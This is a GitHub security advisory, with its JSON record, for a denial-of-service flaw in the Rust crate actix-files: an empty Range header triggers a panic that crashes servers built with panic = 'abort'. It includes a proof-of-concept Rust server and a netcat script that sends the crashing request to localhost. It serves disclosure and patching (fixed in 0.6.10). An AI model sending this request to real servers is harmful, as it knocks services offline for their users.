GHSA-GCQF-3G44-VC9P
Vulnerability from github – Published: 2026-02-06 19:00 – Updated: 2026-02-06 19:00Summary
A GET request for a static file served by actix-files with an empty Range header triggers a panic. With panic = "abort", a remote user may crash the process on-demand.
Details
actix-files assumes that HttpRange::parse(), when Ok, always returns a vector with at least one element. When parse() is called on an empty string, it returns Ok(vec![]). This can cause a panic at named.rs:534 when handling an HTTP request with an empty Range: header. This shouldn't significantly impact programs built with the default panic = "unwind", as the only effect is that the connection is closed when the worker thread panics and new threads are spooled up on demand. Programs built with panic = "abort" are vulnerable to being crashed on-demand by any user with permissions to perform a GET request for a static file served by actix-files.
https://github.com/actix/actix-web/blob/0383f4bdd1210e726143ca1ebcf01169b67a4b6c/actix-files/src/named.rs#L530-L535
PoC
Minimal reproduction `Cargo.toml`:[package]
name = "example"
version = "0.1.0"
edition = "2021"
[dependencies]
actix-web = "=4.5.1"
actix-files = "=0.6.5"
[profile.dev]
panic = "abort"
use actix_files::NamedFile;
use actix_web::{get, Responder};
#[get("/")]
async fn index() -> impl Responder {
NamedFile::open("test_file")
}
#[actix_web::main]
async fn main() -> std::io::Result<()> {
use actix_web::{App, HttpServer};
HttpServer::new(|| App::new().service(index))
.bind(("127.0.0.1", 8080))?
.run()
.await
}
#!/bin/bash
echo foo > test_file
cargo b
cargo r&
sleep 1
nc 127.0.0.1 8080 << EOF
GET / HTTP/1.1
Range:
EOF
kill %1
Impact
It is believed that only programs compiled with panic = "abort" are affected significantly. The only potential impact that can be seen is Denial of Service, though an attacker able to repeatedly send GET requests without those requests getting blocked by rate limiting, DDoS protection, etc. would be able to keep a server down indefinitely. As only a single unblocked request is needed to trigger the panic, merely having a rate limiter may not be enough to prevent this.
Though the impact in the worst case is significant, the real-world risk of this vulnerability appears to be limited, as it would be expected that anyone for whom uptime is a significant concern would not compile their program with panic = "abort".
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.6.9"
},
"package": {
"ecosystem": "crates.io",
"name": "actix-files"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-06T19:00:12Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nA GET request for a static file served by `actix-files` with an empty `Range` header triggers a panic. With `panic = \"abort\"`, a remote user may crash the process on-demand.\n\n### Details\n`actix-files` assumes that `HttpRange::parse()`, when `Ok`, always returns a vector with at least one element. When `parse()` is called on an empty string, it returns `Ok(vec![])`. This can cause a panic at named.rs:534 when handling an HTTP request with an empty `Range:` header. This shouldn\u0027t significantly impact programs built with the default `panic = \"unwind\"`, as the only effect is that the connection is closed when the worker thread panics and new threads are spooled up on demand. Programs built with `panic = \"abort\"` are vulnerable to being crashed on-demand by any user with permissions to perform a `GET` request for a static file served by `actix-files`.\nhttps://github.com/actix/actix-web/blob/0383f4bdd1210e726143ca1ebcf01169b67a4b6c/actix-files/src/named.rs#L530-L535\n\n### PoC\n\u003cdetails\u003e\n\u003csummary\u003eMinimal reproduction\u003c/summary\u003e\n\n`Cargo.toml`:\n```toml\n[package]\nname = \"example\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n[dependencies]\nactix-web = \"=4.5.1\"\nactix-files = \"=0.6.5\"\n\n[profile.dev]\npanic = \"abort\"\n```\n`src/main.rs`:\n```rust\nuse actix_files::NamedFile;\nuse actix_web::{get, Responder};\n\n#[get(\"/\")]\nasync fn index() -\u003e impl Responder {\n NamedFile::open(\"test_file\")\n}\n\n#[actix_web::main]\nasync fn main() -\u003e std::io::Result\u003c()\u003e {\n use actix_web::{App, HttpServer};\n\n HttpServer::new(|| App::new().service(index))\n .bind((\"127.0.0.1\", 8080))?\n .run()\n .await\n}\n```\n`test.sh`:\n```sh\n#!/bin/bash\n\necho foo \u003e test_file\ncargo b\ncargo r\u0026\nsleep 1\nnc 127.0.0.1 8080 \u003c\u003c EOF\nGET / HTTP/1.1\nRange:\n\nEOF\nkill %1\n```\n\nCreate these files, then run `chmod +x test.sh \u0026\u0026 ./test.sh`. The server should start, then crash upon receiving the `GET` request from `netcat`.\n\nThis assumes a reasonably UNIX-like system with Rust, `bash` and `netcat` installed.\n\u003c/details\u003e\n\n### Impact\nIt is believed that only programs compiled with panic = \"abort\" are affected significantly. The only potential impact that can be seen is Denial of Service, though an attacker able to repeatedly send GET requests without those requests getting blocked by rate limiting, DDoS protection, etc. would be able to keep a server down indefinitely. As only a single unblocked request is needed to trigger the panic, merely having a rate limiter may not be enough to prevent this.\n\nThough the impact in the worst case is significant, the real-world risk of this vulnerability appears to be limited, as it would be expected that anyone for whom uptime is a significant concern would not compile their program with panic = \"abort\".",
"id": "GHSA-gcqf-3g44-vc9p",
"modified": "2026-02-06T19:00:13Z",
"published": "2026-02-06T19:00:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/actix/actix-web/security/advisories/GHSA-gcqf-3g44-vc9p"
},
{
"type": "PACKAGE",
"url": "https://github.com/actix/actix-web"
},
{
"type": "WEB",
"url": "https://github.com/actix/actix-web/blob/0383f4bdd1210e726143ca1ebcf01169b67a4b6c/actix-files/src/named.rs#L530-L535"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "[actix-files] Panic triggered by empty Range header in GET request for static file"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.